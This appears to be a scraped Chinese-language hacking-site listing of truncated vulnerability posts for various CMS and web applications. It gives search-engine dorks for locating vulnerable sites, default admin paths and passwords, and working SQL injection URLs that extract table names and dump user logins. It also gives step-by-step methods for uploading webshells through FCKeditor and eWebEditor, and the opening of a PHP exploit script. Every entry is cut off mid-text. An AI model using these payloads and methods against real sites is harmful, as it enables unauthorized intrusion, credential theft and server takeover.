百度关键字:inurl:index.php?ac=article&at=read&did= =========================================================================================================== 默认后台:adminsoft/index.php   OR    admin =========================================================================================================== 爆表前缀:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0&#...

Bulletlink Newspaper Template Software  (target_form.asp) 0day Blind SQL-Injection 作者: easypwn 官网: www.bulletlink.com 测试平台: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server) 测试： http://www.badguest.cn /target_form.asp?pform={{DeleteMember}}’SQLi 模拟:  http://www.badguest.cn /target_form.asp?pform={{DeleteMember}}’%20AND%208589=8589%20AND%20′pRKy’='pRKy 修复：过滤target_form.asp页面参数输入

Author:mer4en7y Blog:www.hi.baidu.com/alonecode 1)注入漏洞： 漏洞文件:new_list.asp: bid = trim(request(“bid”)) sid = trim(request(“sid”)) … if bid<>”" then bwhere = ” and bigid=”& bid &”" else bwhere = “” end if if sid<>”" then swhere = ” and smallid=”& sid &”" else swhere = “” end if idsql=”select * from lxscms_n where shenhe=1″& bwhere & swhere &” order by id desc” 表名:lxscms_u字段:qwbmuname,qwbmupwds 默认后台:/admin 2)数据...

影响版本：JournalX 2.0  官方网站：http://www.magtech.com.cn 产品介绍： JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。 google or baidu 关键字：inurl:volumn/current_abs.shtml 因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。 在Web根目录访问 /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector      上传JSP马 = 系统权限。 上传后访问路径：http://www.sitedirsec.c...

g.cn关键字：6CMS企业望站管理系统(中英繁三语版) 默认帐号密码：admin 后台：admin/ 也不知道程序员怎么弄得，我看到程序admin目录下有个防注入的sql.asp 但是上级目录却没有 默认数据库：data/#sze7xiaohu.mdb seeion验证感觉也有点乱来，记得有个admin目录下发布职位的文件可以直接访问（具体哪个文件），貌似可以直接发布消息 直接放啊D。 后台也直接数据库备份。 感觉没啥利用价值。没意思，自己当研究玩吧

aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且 支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。 漏洞文件：/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转，所以要快，建议用快捷键复制 爆用户名EXP: http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 这是爆ID...

# EXP：  # Date: 2011-09-02  # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  # Software Link: http://downloads.wordpress.org/plugin/videowhisper-video-presentation.zip  # Version: 1.1 (tested)  # Note: magic_quotes has to be turned off  —————  PoC (POST data)  —————  http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php   s=-1′ AND 1=IF(2>1,BENCHMARK(...

<?php $sbcopyright=’ —————————————- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02   Usage: php ‘.$argv[0].’ host /path Example: php ‘.$argv[0].’ 127.0.0.1 / —————————————- ‘; if ($argc < 3) { print_r($sbcopyright); die(); }   ob_start(); $url = $argv[...

aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。 漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转，所以要快，建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 这是爆ID=1的账户名，如果发现权限...

作者：脚本小子 Google搜索：inurl:xxhs.asp?classid= 漏洞eWebEditor5.5 拿webshell方法 直接进后台eWebEditor/admin/login.asp 默认账号密码 admin admin 登陆后台点击“样式管理” 在popup样式管理 修改 路径模式：选择绝对路径 图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx 图片类型比如就是我们要上传的ASP木马格式 上传路径：/ 图片限制：写上1000 免的上不了我们的asp木马 上传内容不要写 然后我们就可以提交了 就可以看到样式增加成功！ 然后把 下面的代码保存为scriptkiddies.html <form action=”...